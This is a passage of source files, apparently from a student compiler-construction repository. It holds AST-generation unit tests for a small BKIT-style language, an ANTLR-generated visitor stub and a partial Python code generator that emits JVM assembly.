fact(n-1);\nEndIf.\nEndBody.\nFunction: main\nBody:\nx = 10;\nfact (x);\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],None),VarDecl(Id('y'),[1,3],ArrayLiteral([ArrayLiteral([ArrayLiteral([IntLiteral(12),IntLiteral(1)]),ArrayLiteral([FloatLiteral(12.0),FloatLiteral(12000.0)])]),ArrayLiteral([IntLiteral(23)]),ArrayLiteral([IntLiteral(13),IntLiteral(32)])])),FuncDecl(Id('fact'),[VarDecl(Id('n'),[],None)],([],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('b'))),If([(BinaryOp(\"\"\"==\"\"\",Id('n'),IntLiteral(0)),[],[Return(IntLiteral(1))])],([],[Return(BinaryOp(\"\"\"*\"\"\",Id('n'),CallExpr(Id('fact'),[BinaryOp(\"\"\"-\"\"\",Id('n'),IntLiteral(1))])))]))])),FuncDecl(Id('main'),[],([],[Assign(Id('x'),IntLiteral(10)),CallStmt(Id('fact'),[Id('x')])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,309))\n\n\tdef test_384(self):\n\t\tinput = \"\"\"\n Function: main_123_main\n Parameter: a, b[1][100]\n Body:\n While a<b Do\n EndWhile.\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main_123_main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1,100],None)],([],[While(BinaryOp(\"\"\"<\"\"\",Id('a'),Id('b')),([],[]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,384))\n\n\tdef test_374(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\na = (a + b) +. (a-a-.a*a*.a\\.b%!c&&a||a==b);\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),BinaryOp(\"\"\"+.\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),BinaryOp(\"\"\"==\"\"\",BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"&&\"\"\",BinaryOp(\"\"\"-.\"\"\",BinaryOp(\"\"\"-\"\"\",Id('a'),Id('a')),BinaryOp(\"\"\"%\"\"\",BinaryOp(\"\"\"\\.\"\"\",BinaryOp(\"\"\"*.\"\"\",BinaryOp(\"\"\"*\"\"\",Id('a'),Id('a')),Id('a')),Id('b')),UnaryOp(\"\"\"!\"\"\",Id('c')))),Id('a')),Id('a')),Id('b'))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,374))\n\n\tdef test_359(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\nfoo(arg1, \"???\", foo(nothing));\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[CallStmt(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')])])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,359))\n\n\tdef test_368(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1 ];\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),ArrayCell(Id('b'),[BinaryOp(\"\"\"+\"\"\",ArrayCell(CallExpr(Id('something'),[]),[ArrayCell(Id('a'),[IntLiteral(1)])]),IntLiteral(1))]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,368))\n\n\tdef test_313(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var:x = 1, y;\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('y'),[],None)],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,313))\n\n\tdef test_344(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n a = !(x && y || b) && (a || abc);\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Assign(Id('a'),BinaryOp(\"\"\"&&\"\"\",UnaryOp(\"\"\"!\"\"\",BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"&&\"\"\",Id('x'),Id('y')),Id('b'))),BinaryOp(\"\"\"||\"\"\",Id('a'),Id('abc'))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,344))\n\n\tdef test_305(self):\n\t\tinput = \"\"\"Var: a,b=1,c[3]={1,2,3};\nFunction: main\nBody:\nReturn;\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],IntLiteral(1)),VarDecl(Id('c'),[3],ArrayLiteral([IntLiteral(1),IntLiteral(2),IntLiteral(3)])),FuncDecl(Id('main'),[],([],[Return(None)]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,305))\n\n\tdef test_321(self):\n\t\tinput = \"\"\"Function: main\n Parameter: a\n Body:\n If 1 + a - b * foo() > 1 Then\n EndIf.\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"-\"\"\",BinaryOp(\"\"\"+\"\"\",IntLiteral(1),Id('a')),BinaryOp(\"\"\"*\"\"\",Id('b'),CallExpr(Id('foo'),[]))),IntLiteral(1)),[],[])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,321))\n\n\tdef test_385(self):\n\t\tinput = \"\"\"Function: somwname\nBody:\n\nEndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('somwname'),[],([],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,385))\n\n\tdef test_301(self):\n\t\tinput = \"\"\"Var:x = 1;\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],IntLiteral(1))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,301))\n\n\tdef test_323(self):\n\t\tinput = \"\"\"Function: main\n Parameter: a\n Body:\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,323))\n\n\tdef test_371(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1][c + d < 1] + c *. d[1][21 * 0x21AF];\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",ArrayCell(Id('b'),[BinaryOp(\"\"\"+\"\"\",ArrayCell(CallExpr(Id('something'),[]),[ArrayCell(Id('a'),[IntLiteral(1)])]),IntLiteral(1)),BinaryOp(\"\"\"<\"\"\",BinaryOp(\"\"\"+\"\"\",Id('c'),Id('d')),IntLiteral(1))]),BinaryOp(\"\"\"*.\"\"\",Id('c'),ArrayCell(Id('d'),[IntLiteral(1),BinaryOp(\"\"\"*\"\"\",IntLiteral(21),IntLiteral(8623))]))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,371))\n\n\tdef test_363(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing), {\"asdab\", {1,2.e2,123e1,\"nothing\"}});\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[CallStmt(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')]),ArrayLiteral([StringLiteral(\"\"\"asdab\"\"\"),ArrayLiteral([IntLiteral(1),FloatLiteral(200.0),FloatLiteral(1230.0),StringLiteral(\"\"\"nothing\"\"\")])])])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,363))\n\n\tdef test_302(self):\n\t\tinput = \"\"\"Var:x = 1, y;\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('y'),[],None)])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,302))\n\n\tdef test_393(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a, a[1][12]\nBody:\nVar: x[1][2] = {\"ab\",\"da\"};\na[3 + foo(2)] = a[b[2][3]] + 4;\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('a'),[1,12],None)],([VarDecl(Id('x'),[1,2],ArrayLiteral([StringLiteral(\"\"\"ab\"\"\"),StringLiteral(\"\"\"da\"\"\")]))],[Assign(ArrayCell(Id('a'),[BinaryOp(\"\"\"+\"\"\",IntLiteral(3),CallExpr(Id('foo'),[IntLiteral(2)]))]),BinaryOp(\"\"\"+\"\"\",ArrayCell(Id('a'),[ArrayCell(Id('b'),[IntLiteral(2),IntLiteral(3)])]),IntLiteral(4)))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,393))\n\n\tdef test_397(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a, a[1][12]\nBody:\nIf expr Then \nElseIf expr Then\nWhile expr Do EndWhile.\nDo Return; While {{}} EndDo.\nElse nothing(); a=b+a; Continue;\nEndIf.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('a'),[1,12],None)],([],[If([(Id('expr'),[],[]),(Id('expr'),[],[While(Id('expr'),([],[])),Dowhile(([],[Return(None)]),ArrayLiteral([ArrayLiteral([])]))])],([],[CallStmt(Id('nothing'),[]),Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('b'),Id('a'))),Continue()]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,397))\n\n\tdef test_355(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return (a < 1) || (b >. !c);\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),FloatLiteral(120.0))]))])],[]),Return(BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"<\"\"\",Id('a'),IntLiteral(1)),BinaryOp(\"\"\">.\"\"\",Id('b'),UnaryOp(\"\"\"!\"\"\",Id('c')))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,355))\n\n\tdef test_361(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n a = a[c[1][b]][1] < foo(arg1, \"???\", foo(nothing));\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",ArrayCell(Id('a'),[ArrayCell(Id('c'),[IntLiteral(1),Id('b')]),IntLiteral(1)]),CallExpr(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')])])))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,361))\n\n" }, { "alpha_fraction": 0.7777777910232544, "alphanum_fraction": 0.7829457521438599, "avg_line_length": 32.69565200805664, "blob_id": "f200236fd62692909c2f265f71c24ad160b871ac", "content_id": "b274abcba24842f22b73cc91bfccff2bb1cdd0ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 774, "license_type": "no_license", "max_line_length": 99, "num_lines": 23, "path": "/target/LexicalAnalysisVisitor.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from LexicalAnalysis.g4 by ANTLR 4.8\nfrom antlr4 import *\nif __name__ is not None and \".\" in __name__:\n from .LexicalAnalysisParser import LexicalAnalysisParser\nelse:\n from LexicalAnalysisParser import LexicalAnalysisParser\n\n# This class defines a complete generic visitor for a parse tree produced by LexicalAnalysisParser.\n\nclass LexicalAnalysisVisitor(ParseTreeVisitor):\n\n # Visit a parse tree produced by LexicalAnalysisParser#program.\n def visitProgram(self, ctx:LexicalAnalysisParser.ProgramContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by LexicalAnalysisParser#letter.\n def visitLetter(self, ctx:LexicalAnalysisParser.LetterContext):\n return self.visitChildren(ctx)\n\n\n\ndel LexicalAnalysisParser" }, { "alpha_fraction": 0.5384231805801392, "alphanum_fraction": 0.5412672162055969, "avg_line_length": 42.01161193847656, "blob_id": "423e42d9e01e04f562ddc2049dcdd69c9515301b", "content_id": "b2eac143e225da6aa496ac3a3b8e1e0daea0ffc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34107, "license_type": "no_license", "max_line_length": 176, "num_lines": 775, "path": "/Assignments/assignment4/src/main/bkit/codegen/CodeGenerator.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "'''\r\n * @author Nguyen Hua Phung\r\n * @version 1.0\r\n * 23/10/2015\r\n * This file provides a simple version of code generator\r\n *\r\n'''\r\nfrom abc import ABC, abstractmethod\r\n\r\nfrom Visitor import BaseVisitor\r\nfrom Emitter import Emitter\r\nfrom Frame import Frame\r\nfrom AST import * \r\nfrom functools import reduce\r\n\r\nclass MethodEnv():\r\n def __init__(self, frame, sym):\r\n self.frame = frame\r\n self.symbol = sym\r\nclass Symbol:\r\n def __init__(self,name,mtype,value = None):\r\n self.name = name\r\n self.mtype = mtype\r\n self.value = value\r\nclass CName:\r\n def __init__(self,n):\r\n self.value = n\r\nclass Index:\r\n def __init__(self,n):\r\n self.value = n\r\nclass Type(ABC): pass\r\nclass IntType(Type): pass\r\nclass FloatType(Type): pass\r\nclass VoidType(Type): pass\r\nclass ClassType(Type):\r\n def __init__(self,n):\r\n self.cname = n\r\nclass StringType(Type):pass\r\nclass BoolType(Type): pass\r\nclass MType(Type):\r\n def __init__(self,i,o):\r\n self.partype = i #List[Type]\r\n self.rettype = o #Type\t\r\nclass ArrayType(Type):\r\n def __init__(self,et,*s):\r\n self.eleType = et #Type\r\n self.dimen = s #List[int] \r\n\r\nclass SubBody():\r\n def __init__(self, frame_, symlist_):\r\n self.frame = frame_\r\n self.symbol = symlist_\r\n self.body = []\r\n self.ret = VoidType()\r\n \r\n def printout(self, code_):\r\n self.body += [code_]\r\n \r\n def emitPrintout(self, emiter):\r\n [emiter.emit.printout(code) for code in self.body]\r\n\r\n def setRet(self, rettype_):\r\n self.ret = rettype_\r\n \r\n def getRet(self):\r\n return self.ret\r\n\r\nclass Access():\r\n def __init__(self, frame_, sym_, isLeft=False):\r\n self.frame = frame_\r\n self.symbol = sym_\r\n self.isLeft = isLeft\r\n self.body = []\r\n self.ret = None\r\n \r\n def printout(self, code_):\r\n self.body += [code_]\r\n \r\n def getCode(self):\r\n return self.body\r\n \r\n def setRet(self, rettype_):\r\n self.ret = rettype_\r\n\r\n def getRet(self):\r\n return self.ret\r\n\r\nclass StaticAttribute():\r\n def __init__(self, className, name, ast):\r\n self.className = className\r\n self.name = name\r\n self.ast = ast\r\n def init(self, a, codegen):\r\n init_code, typ = codegen.visit(self.ast.varInit, a)\r\n codegen.emit.printAt(codegen.emit.emitATTRIBUTE(self.name, typ, False, ''), codegen.emit.getBuffLen() - 1 )\r\n # codegen.emit.printout(init_code)\r\n # codegen.emit.printout(codegen.emit.emitPUTSTATIC(self.className + '.' + self.name, typ, a.frame))\r\n\r\nclass CodeGenerator():\r\n def __init__(self):\r\n self.libName = \"io\"\r\n\r\n def init(self):\r\n return [Symbol(\"read\", MType([], StringType()), CName(self.libName)),\r\n Symbol(\"printLn\", MType([], VoidType()), CName(self.libName)),\r\n Symbol(\"printStrLn\", MType([StringType()], VoidType()), CName(self.libName)),\r\n Symbol(\"print\", MType([StringType()], VoidType()), CName(self.libName)),\r\n\t\t Symbol(\"string_of_int\", MType([IntType()], StringType()), CName(self.libName))\r\n ]\r\n\r\n def gen(self, ast, dir_):\r\n #ast: AST\r\n #dir_: String\r\n\r\n gl = self.init()\r\n gc = CodeGenVisitor(ast, gl, dir_)\r\n gc.visit(ast, None)\r\n\r\n\r\n\r\nclass CodeGenVisitor(BaseVisitor):\r\n def __init__(self, astTree, env, dir_):\r\n #astTree: AST\r\n #env: List[Symbol]\r\n #dir_: File\r\n\r\n self.astTree = astTree\r\n self.env = env\r\n self.className = \"MCClass\"\r\n self.path = dir_\r\n self.emit = Emitter(self.path + \"/\" + self.className + \".j\")\r\n self.static = []\r\n self.initVar = []\r\n self.ret = []\r\n self.envFuncNum = 0\r\n self.staticFunction = []\r\n self.initStatic = []\r\n self.clinitStackSize = 0\r\n\r\n def visitProgram(self, ast:Program, c):\r\n #ast: Program\r\n #c: Any\r\n\r\n self.emit.printout(self.emit.emitPROLOG(self.className, \"java.lang.Object\"))\r\n e = MethodEnv(None, self.env)\r\n self.envFuncNum = len(self.env)\r\n # self.env = [self.visit(decl, e) for decl in ast.decl] + self.env\r\n for decl in ast.decl:\r\n s = self.visit(decl, e)\r\n e.symbol.append(s)\r\n # reduce(lambda e, decl: e.symbol + [self.visit(decl, e)], ast.decl, e)\r\n # self.genMain(e) \r\n # generate default constructor\r\n self.genInit()\r\n self.genClinit()\r\n # generate class init if necessary\r\n self.emit.emitEPILOG()\r\n return c\r\n \r\n # We do not need to save the signature of all the function due to\r\n # the assumption that there is no semantic error!\r\n # In the callee we only need to infer the type it self\r\n # def visitGlobal(self,ast,c):\r\n # if isinstance(ast, FuncDecl):\r\n # return Symbol(ast.name.name, MType([None]*len(ast.param), None))\r\n # if isinstance(ast, VarDecl):\r\n # return Symbol(ast.variable.name, None)\r\n\r\n def genInit(self):\r\n methodname,methodtype = \"<init>\",MType([],VoidType())\r\n frame = Frame(methodname, methodtype.rettype)\r\n self.emit.printout(self.emit.emitMETHOD(methodname,methodtype,False,frame))\r\n frame.enterScope(True)\r\n varname,vartype,varindex = \"this\",ClassType(self.className),frame.getNewIndex()\r\n startLabel, endLabel = frame.getStartLabel(), frame.getEndLabel()\r\n self.emit.printout(self.emit.emitVAR(varindex, varname, vartype, startLabel, endLabel,frame ))\r\n self.emit.printout(self.emit.emitLABEL(startLabel,frame))\r\n self.emit.printout(self.emit.emitREADVAR(varname, vartype, varindex, frame))\r\n self.emit.printout(self.emit.emitINVOKESPECIAL(frame))\r\n # printout the init_code of the static field\r\n a = Access(frame, self.env, isLeft=False)\r\n [static.init(a, self) for static in self.static]\r\n self.clinitStackSize = a.frame.getMaxOpStackSize()\r\n # _________\r\n self.emit.printout(self.emit.emitLABEL(endLabel, frame))\r\n self.emit.printout(self.emit.emitRETURN(methodtype.rettype, frame))\r\n self.emit.printout(self.emit.emitENDMETHOD(frame))\r\n \r\n def genClinit(self):\r\n methodname,methodtype = \"<clinit>\",MType([],VoidType())\r\n frame = Frame(methodname, methodtype.rettype)\r\n self.emit.printout(self.emit.emitMETHOD(methodname,methodtype,True,frame))\r\n frame.enterScope(True)\r\n varname,vartype,varindex = \"this\",ClassType(self.className),frame.getNewIndex()\r\n startLabel, endLabel = frame.getStartLabel(), frame.getEndLabel()\r\n # self.emit.printout(self.emit.emitVAR(varindex, varname, vartype, startLabel, endLabel,frame ))\r\n self.emit.printout(self.emit.emitLABEL(startLabel,frame))\r\n # self.emit.printout(self.emit.emitREADVAR(varname, vartype, varindex, frame))\r\n # self.emit.printout(self.emit.emitINVOKESPECIAL(frame))\r\n # printout the init_code of the static field\r\n [self.emit.printout(p) for p in self.initStatic]\r\n self.initStatic = []\r\n frame.maxOpStackSize = self.clinitStackSize\r\n # _________\r\n self.emit.printout(self.emit.emitLABEL(endLabel, frame))\r\n self.emit.printout(self.emit.emitRETURN(methodtype.rettype, frame))\r\n self.emit.printout(self.emit.emitENDMETHOD(frame))\r\n \"\"\"\r\n * In var decl, this should add the symbol to frame for later work\r\n TODOs: \r\n @param: self\r\n @param: \r\n \"\"\"\r\n def visitVarDecl(self,ctx:VarDecl,o):\r\n var_name = ctx.variable.name\r\n dimen = list(ctx.varDimen)\r\n if isinstance(dimen, tuple):\r\n dimen = dimen[0]\r\n a = Access(o.frame, o.symbol, isLeft=False)\r\n if ctx.varInit:\r\n # handle normal declarations with the assumption of the ass4\r\n if o.frame == None:\r\n self.static.append(StaticAttribute(self.className, var_name, ctx))\r\n methodname,methodtype = \"<init>\",MType([],VoidType())\r\n a.frame = Frame(methodname, methodtype.rettype)\r\n init_code, typ = self.visit(ctx.varInit, a)\r\n init_code += self.emit.emitPUTSTATIC(self.className + '.' + var_name, typ, a.frame)\r\n self.initStatic.append(init_code)\r\n return Symbol(var_name, typ, CName(self.className))\r\n else:\r\n init_code, typ = self.visit(ctx.varInit, o)\r\n # if len(dimen):\r\n # typ = ArrayType(typ, dimen)\r\n idx = o.frame.getNewIndex()\r\n start_label = o.frame.getStartLabel()\r\n end_label = o.frame.getEndLabel()\r\n self.emit.printout(self.emit.emitVAR(idx, var_name, typ, start_label, end_label, o.frame))\r\n init_code += self.emit.emitWRITEVAR(var_name, typ, idx, o.frame)\r\n self.initVar.append(init_code)\r\n # print('Index of {} in decl is {}'.format(var_name, idx))\r\n return Symbol(var_name, typ, Index(idx))\r\n else:\r\n # for param in functions\r\n idx = o.frame.getNewIndex()\r\n # self.emit.printout(self.emit.emitVAR(idx, var_name, typ, start_label, end_label, o.frame))\r\n if len(dimen):\r\n typ = ArrayType(None, dimen)\r\n else:\r\n typ = None\r\n return Symbol(var_name, typ, Index(idx))\r\n \r\n def visitFuncDecl(self,ctx:FuncDecl,o):\r\n frame = Frame(ctx.name.name, VoidType())\r\n subBody = SubBody(frame, o.symbol)\r\n frame.enterScope(True)\r\n begin_pos = self.emit.getBuffLen()\r\n partype = rettype = None\r\n for method in self.staticFunction:\r\n if method.name == ctx.name.name:\r\n # have invoked before its decl\r\n partype = method.mtype.partype\r\n rettype = method.mtype.rettype\r\n params = [self.visit(p, subBody) for p in ctx.param]\r\n if partype != None:\r\n params = list(map(lambda x, y: Symbol(x.name, y, x.value), params, partype))\r\n subBody.symbol = params + subBody.symbol\r\n # reduce(lambda e, decl: e.symbol + [self.visit(decl, e)], ctx.param, subBody)\r\n subBody.symbol = [self.visit(p, subBody) for p in ctx.body[0]] + subBody.symbol\r\n # reduce(lambda e, decl: e.symbol + [self.visit(decl, e)], ctx.body[0], subBody)\r\n self.emit.printout(self.emit.emitLABEL(frame.getStartLabel(), frame))\r\n [self.emit.printout(p) for p in self.initVar]\r\n self.initVar = []\r\n [self.visit(p, subBody) for p in ctx.body[1]]\r\n # after visit all stmt inside the body\r\n # there a trick to printout the method decl\r\n intype = []\r\n for name in [decl.variable.name for decl in ctx.param]:\r\n for sym in subBody.symbol:\r\n if sym.name == name:\r\n start_label = subBody.frame.getStartLabel()\r\n end_label = subBody.frame.getEndLabel()\r\n if type(sym.mtype) is ArrayType:\r\n if isinstance(sym.mtype.dimen, tuple):\r\n sym.mtype.dimen = sym.mtype.dimen[0]\r\n self.emit.printAt(self.emit.emitVAR(sym.value.value, name, sym.mtype, start_label, end_label, o.frame), self.emit.getBuffLen() - begin_pos)\r\n intype.append(sym.mtype)\r\n break\r\n typ = MType(intype, subBody.getRet())\r\n # for the Main function: it should be public static void main(String[] args)\r\n if ctx.name.name == 'main':\r\n start_label = subBody.frame.getStartLabel()\r\n end_label = subBody.frame.getEndLabel()\r\n self.emit.printAt(self.emit.emitVAR(frame.getNewIndex(), 'args', ArrayType(StringType(), [1]), start_label, end_label, o.frame), self.emit.getBuffLen() - begin_pos)\r\n typ = MType([ArrayType(StringType(), [1])], VoidType())\r\n print('come here')\r\n self.emit.printAt(self.emit.emitMETHOD(ctx.name.name, typ, True, o.frame), self.emit.getBuffLen() - begin_pos)\r\n self.emit.printout(self.emit.emitLABEL(frame.getEndLabel(), frame))\r\n # [self.emit.printout(code) for code in self.ret]\r\n # self.emit.printout(self.emit.emitRETURN(typ.rettype, frame))\r\n self.emit.printout(self.emit.emitENDMETHOD(frame))\r\n frame.exitScope()\r\n o.symbol += [Symbol(ctx.name.name, typ, CName(self.className))]\r\n\r\n def visitAssign(self,ctx:Assign,o):\r\n access = Access(o.frame, o.symbol, isLeft=False)\r\n rhs_code, r_type = self.visit(ctx.rhs, access)\r\n access.isLeft = True\r\n lhs_code, l_type = self.visit(ctx.lhs, access)\r\n # Infer the type of unknown\r\n if rhs_code == None:\r\n self.infer(ctx.rhs, l_type, access)\r\n access.isLeft = False\r\n rhs_code, r_type = self.visit(ctx.rhs, access)\r\n # print(rhs_code)\r\n if lhs_code == None:\r\n self.infer(ctx.lhs, r_type, access)\r\n access.isLeft = True\r\n lhs_code, l_type = self.visit(ctx.lhs, access)\r\n # We must have the correct type after infered (instead of None)\r\n lines = lhs_code.split('\\n')\r\n lines.insert(-2, rhs_code)\r\n self.emit.printout('\\n'.join(lines))\r\n\r\n def visitIf(self, ctx:If, o):\r\n labels = list(map(lambda x: o.frame.getNewLabel(), range(len(ctx.ifthenStmt) + 1)))\r\n for idx in range(len(ctx.ifthenStmt)):\r\n access = Access(o.frame, o.symbol, False)\r\n expr_code, typ = self.visit(ctx.ifthenStmt[idx][0], access)\r\n if typ == None:\r\n self.inferId(ctx.ifthenStmt[idx][0], BoolType(), access)\r\n expr_code, typ = self.visit(ctx.ifthenStmt[idx][0], access)\r\n l1 = labels[idx]\r\n l2 = labels[-1]\r\n self.emit.printout(expr_code)\r\n self.emit.printout(self.emit.emitIFFALSE(l1, access.frame))\r\n access.symbol = [self.visit(decl, access) for decl in ctx.ifthenStmt[idx][1]] + access.symbol\r\n [self.emit.printout(p) for p in self.initVar]\r\n self.initVar = []\r\n [self.visit(stmt, access) for stmt in ctx.ifthenStmt[idx][2]]\r\n self.emit.printout(self.emit.emitGOTO(l2, access.frame))\r\n self.emit.printout(self.emit.emitLABEL(l1, access.frame))\r\n if ctx.elseStmt:\r\n access.symbol = [self.visit(decl, access) for decl in ctx.elseStmt[0]] + access.symbol\r\n [self.emit.printout(p) for p in self.initVar]\r\n self.initVar = []\r\n [self.visit(stmt, access) for stmt in ctx.elseStmt[1]]\r\n self.emit.printout(self.emit.emitLABEL(labels[-1], access.frame)) \r\n \r\n def visitWhile(self, ctx:While, o):\r\n access = Access(o.frame, o.symbol, False)\r\n o.frame.enterLoop()\r\n inL, outL = o.frame.getContinueLabel(), o.frame.getBreakLabel()\r\n self.emit.printout(self.emit.emitLABEL(inL, o.frame))\r\n # condition\r\n expr_code, typ = self.visit(ctx.exp, access)\r\n if expr_code == None:\r\n self.infer(ctx.exp, BoolType(), access)\r\n expr_code, typ = self.visit(ctx.exp, access)\r\n self.emit.printout(expr_code)\r\n self.emit.printout(self.emit.emitIFFALSE(outL, access.frame))\r\n # declaration\r\n access.symbol = [self.visit(decl, access) for decl in ctx.sl[0]] + access.symbol\r\n [self.emit.printout(p) for p in self.initVar]\r\n self.initVar = []\r\n # enter loop\r\n [self.visit(stmt, access) for stmt in ctx.sl[1]]\r\n self.emit.printout(self.emit.emitGOTO(inL, access.frame))\r\n self.emit.printout(self.emit.emitLABEL(outL, access.frame))\r\n o.frame.exitLoop()\r\n \r\n def visitFor(self, ctx:For, o):\r\n o.frame.enterLoop()\r\n inL, outL = o.frame.getContinueLabel(), o.frame.getBreakLabel()\r\n o_ = Access(o.frame, o.symbol, False)\r\n # init\r\n expr1_code, _ = self.visit(ctx.expr1, o_)\r\n if expr1_code == None:\r\n self.infer(ctx.expr1, IntType(), o_)\r\n expr1_code, _ = self.visit(ctx.expr1, o_)\r\n o_.isLeft = True\r\n idx1_code, _ = self.visit(ctx.idx1, o_)\r\n o_.isLeft = False\r\n expr2_code, _ = self.visit(ctx.expr2, o_)\r\n if expr2_code == None:\r\n self.infer(ctx.expr2, IntType(), o_)\r\n expr1_code, _ = self.visit(ctx.expr2, o_)\r\n expr3_code, _ = self.visit(ctx.expr3, o_)\r\n if expr3_code == None:\r\n self.infer(ctx.expr3, IntType(), o_)\r\n expr1_code, _ = self.visit(ctx.expr3, o_)\r\n # decl\r\n [self.visit(decl, o_) for decl in ctx.loop[0]]\r\n [self.emit.printout(p) for p 